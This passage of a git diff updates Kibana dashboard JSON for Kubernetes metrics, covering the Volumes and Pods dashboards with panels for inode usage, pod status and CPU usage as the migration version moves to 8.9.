"Filesystem Inodes Informations [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" + "b5cfcf26-889f-4514-a8b6-57f68267cfd2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Used Inodes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.volume.fs.inodes.used" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "aa3d3e9c-a555-4b69-9dc2-7f1ff0e641ff", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.volume" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 17, - "i": "eec01fb6-ac46-4573-b231-4394ac7090c0", - "w": 48, - "x": 0, - "y": 21 - }, - "panelIndex": "eec01fb6-ac46-4573-b231-4394ac7090c0", - "title": "Filesystem Inodes Informations [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Volumes", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-01-11T14:19:35.010Z", - "id": "kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "0f641488-aa6d-4409-9789-5967590635d5:indexpattern-datasource-layer-ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "0f641488-aa6d-4409-9789-5967590635d5:e2cc978e-4d26-4a84-8c40-20a4af3abf83", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "eec01fb6-ac46-4573-b231-4394ac7090c0:indexpattern-datasource-layer-ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "eec01fb6-ac46-4573-b231-4394ac7090c0:aa3d3e9c-a555-4b69-9dc2-7f1ff0e641ff", - "type": 
"index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_c9e17236-d41d-4748-8eb7-54c93d5a1478:optionsListDataView", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_049e831a-2716-4c4b-a037-b2b45789842a:optionsListDataView", - "type": "index-pattern" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.volume" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "3d17c7ea-eb86-4234-9e24-9b304fc6da9b", + "isTransposed": false + }, + { + "columnId": "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", + "isTransposed": false + }, + { + "columnId": "1e1cd98f-fe72-473f-86ab-e79a621f8527", + "isTransposed": false + }, + { + "columnId": "b5cfcf26-889f-4514-a8b6-57f68267cfd2", + "isTransposed": false + } + ], + "layerId": "ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "Filesystem Inodes Informations [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_60ec5f9c-087d-48e6-98ab-488952a7b186:optionsListDataView", - "type": "index-pattern" - } + "title": "Filesystem Inodes Informations [Metrics Kubernetes]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Kubernetes] Volumes", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "0f641488-aa6d-4409-9789-5967590635d5:indexpattern-datasource-layer-ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "0f641488-aa6d-4409-9789-5967590635d5:e2cc978e-4d26-4a84-8c40-20a4af3abf83", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"eec01fb6-ac46-4573-b231-4394ac7090c0:indexpattern-datasource-layer-ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "eec01fb6-ac46-4573-b231-4394ac7090c0:aa3d3e9c-a555-4b69-9dc2-7f1ff0e641ff", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_c9e17236-d41d-4748-8eb7-54c93d5a1478:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_049e831a-2716-4c4b-a037-b2b45789842a:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_60ec5f9c-087d-48e6-98ab-488952a7b186:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013.json index 03af84bd555..ae59fa0ad42 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013.json 
@@ -1,1647 +1,1663 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"7c68c5e5-70ee-4a8d-88d5-dcd8c6dbd6d2\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"7c68c5e5-70ee-4a8d-88d5-dcd8c6dbd6d2\",\"selectedOptions\":[],\"enhancements\":{}}},\"c08d3539-51f7-4256-861b-c3c323edfb86\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"c08d3539-51f7-4256-861b-c3c323edfb86\",\"selectedOptions\":[],\"enhancements\":{}}},\"4a85f45a-ea4c-4514-a71c-b15979915ce3\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.pod.name\",\"title\":\"Pod Name\",\"id\":\"4a85f45a-ea4c-4514-a71c-b15979915ce3\",\"selectedOptions\":[],\"enhancements\":{}}}}" + "id": "kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI0NiwyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "twoLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"7c68c5e5-70ee-4a8d-88d5-dcd8c6dbd6d2\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster 
Name\",\"id\":\"7c68c5e5-70ee-4a8d-88d5-dcd8c6dbd6d2\",\"selectedOptions\":[],\"enhancements\":{}}},\"c08d3539-51f7-4256-861b-c3c323edfb86\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"c08d3539-51f7-4256-861b-c3c323edfb86\",\"selectedOptions\":[],\"enhancements\":{}}},\"4a85f45a-ea4c-4514-a71c-b15979915ce3\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.pod.name\",\"title\":\"Pod Name\",\"id\":\"4a85f45a-ea4c-4514-a71c-b15979915ce3\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Metrics about Pods", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "72efb777-3b17-42a9-91c5-b17ee964ce28", + "w": 48, + "x": 0, + "y": 0 }, - "description": "Metrics about Pods", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "panelIndex": "72efb777-3b17-42a9-91c5-b17ee964ce28", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes 
DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "title": "Kubernetes Dashboards [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "0a10c73f-959b-40e1-b1a2-609c3fd59914", + "w": 48, + "x": 0, + "y": 4 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes 
PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false + "panelIndex": "0a10c73f-959b-40e1-b1a2-609c3fd59914", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-307ec163-d913-4ce0-8e9b-6dfc777def59", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f30047fb-d7fd-4873-9150-6e16c369fcc8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "307ec163-d913-4ce0-8e9b-6dfc777def59": { + "columnOrder": [ + "8c03fc54-6e2d-49ff-b294-bb80ae6a1a8e", + "7b682fd2-3fd6-4834-8067-a546ab543764", + "e9919412-9d5f-4db8-96bf-ab35a7b11c87", + "b1ecf062-bf74-4458-9598-2c7018cdae3d" + ], + "columns": { + "7b682fd2-3fd6-4834-8067-a546ab543764": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.status.phase: *" + }, + "isBucketed": false, + "label": "Phase", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.status.phase" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "72efb777-3b17-42a9-91c5-b17ee964ce28", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "72efb777-3b17-42a9-91c5-b17ee964ce28", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-307ec163-d913-4ce0-8e9b-6dfc777def59", - "type": "index-pattern" + "8c03fc54-6e2d-49ff-b294-bb80ae6a1a8e": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Pod", + 
"operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": false, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "f30047fb-d7fd-4873-9150-6e16c369fcc8", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "307ec163-d913-4ce0-8e9b-6dfc777def59": { - "columnOrder": [ - "8c03fc54-6e2d-49ff-b294-bb80ae6a1a8e", - "7b682fd2-3fd6-4834-8067-a546ab543764", - "e9919412-9d5f-4db8-96bf-ab35a7b11c87", - "b1ecf062-bf74-4458-9598-2c7018cdae3d" - ], - "columns": { - "7b682fd2-3fd6-4834-8067-a546ab543764": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.status.phase: *" - }, - "isBucketed": false, - "label": "Phase", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.status.phase" - }, - "8c03fc54-6e2d-49ff-b294-bb80ae6a1a8e": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Pod", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": false, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 1000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - }, - "b1ecf062-bf74-4458-9598-2c7018cdae3d": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.status.scheduled: *" - }, - "isBucketed": false, - "label": "Scheduled", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.status.scheduled" - }, - "e9919412-9d5f-4db8-96bf-ab35a7b11c87": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.status.ready: *" - }, - "isBucketed": false, - "label": 
"Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.status.ready" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "f30047fb-d7fd-4873-9150-6e16c369fcc8", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "columns": [ - { - "collapseFn": "", - "columnId": "8c03fc54-6e2d-49ff-b294-bb80ae6a1a8e", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "7b682fd2-3fd6-4834-8067-a546ab543764", - "hidden": false, - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "e9919412-9d5f-4db8-96bf-ab35a7b11c87", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "b1ecf062-bf74-4458-9598-2c7018cdae3d", - "isTransposed": false - } - ], - "headerRowHeight": "single", - "headerRowHeightLines": 1, - "layerId": "307ec163-d913-4ce0-8e9b-6dfc777def59", - "layerType": "data", - "paging": { - "enabled": true, - "size": 10 - }, - "sorting": { - "direction": "none" - } - } + "size": 1000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" }, - "title": "Status per Pod [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" + "b1ecf062-bf74-4458-9598-2c7018cdae3d": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.status.scheduled: *" + }, + "isBucketed": false, + "label": "Scheduled", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + 
"scale": "ordinal", + "sourceField": "kubernetes.pod.status.scheduled" + }, + "e9919412-9d5f-4db8-96bf-ab35a7b11c87": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.status.ready: *" + }, + "isBucketed": false, + "label": "Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.status.ready" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "f30047fb-d7fd-4873-9150-6e16c369fcc8", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_pod" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "0a10c73f-959b-40e1-b1a2-609c3fd59914", - "w": 48, - "x": 0, - "y": 4 + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "collapseFn": "", + "columnId": "8c03fc54-6e2d-49ff-b294-bb80ae6a1a8e", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "7b682fd2-3fd6-4834-8067-a546ab543764", + "hidden": false, + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "e9919412-9d5f-4db8-96bf-ab35a7b11c87", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "b1ecf062-bf74-4458-9598-2c7018cdae3d", + "isTransposed": false + } + ], + "headerRowHeight": "single", + "headerRowHeightLines": 1, + "layerId": "307ec163-d913-4ce0-8e9b-6dfc777def59", + "layerType": "data", + "paging": { + "enabled": true, + "size": 10 }, - "panelIndex": "0a10c73f-959b-40e1-b1a2-609c3fd59914", - "title": "Status per Pod [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" + "sorting": { + "direction": "none" + } + } }, 
- { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9486d409-e044-43b7-a175-e25695e38cc4", - "type": "index-pattern" + "title": "Status per Pod [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Status per Pod [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "8775bc75-d36c-4e37-94e4-ca63300d9dd3", + "w": 24, + "x": 0, + "y": 19 + }, + "panelIndex": "8775bc75-d36c-4e37-94e4-ca63300d9dd3", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9486d409-e044-43b7-a175-e25695e38cc4", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { + "columnOrder": [ + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "columns": { + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.cpu.usage.node.pct: *" + }, + "isBucketed": false, + "label": "CPU Usage", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "percent", + "params": { + "decimals": 2 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { - "columnOrder": [ - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - 
"86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "columns": { - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.cpu.usage.node.pct: *" - }, - "isBucketed": false, - "label": "CPU Usage", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.cpu.usage.node.pct" - }, - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderBy": { - "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.cpu.usage.node.pct" + }, + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderBy": { + 
"columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "9486d409-e044-43b7-a175-e25695e38cc4", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "9486d409-e044-43b7-a175-e25695e38cc4", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": 
"kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 15, - "i": "8775bc75-d36c-4e37-94e4-ca63300d9dd3", - "w": 24, - "x": 0, - "y": 19 + "layers": [ + { + "accessors": [ + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "panelIndex": "8775bc75-d36c-4e37-94e4-ca63300d9dd3", - "title": "CPU Usage as Pct of the Total Node CPU [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "61027d7f-6398-4aec-b154-897b913481e4", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "CPU Usage as Pct of the Total Node CPU [Metrics Kubernetes]" + }, + { + 
"version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "8e7901b2-cfc3-433d-9dcb-4af30c649efb", + "w": 24, + "x": 24, + "y": 19 + }, + "panelIndex": "8e7901b2-cfc3-433d-9dcb-4af30c649efb", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "61027d7f-6398-4aec-b154-897b913481e4", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { + "columnOrder": [ + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "columns": { + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.cpu.usage.node.pct: *" + }, + "isBucketed": false, + "label": "CPU Usage", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "percent", + "params": { + "decimals": 2 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { - "columnOrder": [ - 